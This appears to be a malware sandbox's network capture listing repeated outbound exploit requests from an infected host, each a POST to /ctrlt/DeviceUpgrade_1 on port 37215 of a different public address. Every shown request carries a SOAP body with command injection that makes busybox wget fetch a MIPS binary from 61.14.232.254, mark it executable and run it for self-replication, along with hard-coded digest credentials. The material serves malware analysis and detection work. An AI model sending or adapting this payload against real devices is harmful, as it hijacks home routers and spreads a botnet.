20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1074192.168.2.1352476197.243.206.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502823114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1075192.168.2.1354816157.236.126.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502876997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1076192.168.2.1343154157.172.24.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502909899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1077192.168.2.1353428157.197.115.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502933025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1078192.168.2.134927841.28.233.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503426075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1079192.168.2.1335222197.216.153.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503427982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1080192.168.2.1360982157.151.100.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503457069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1081192.168.2.13503929.237.72.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503504038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1082192.168.2.1352882157.58.165.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503539085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1083192.168.2.1352034157.240.102.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503565073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1084192.168.2.136040441.178.56.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503592014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
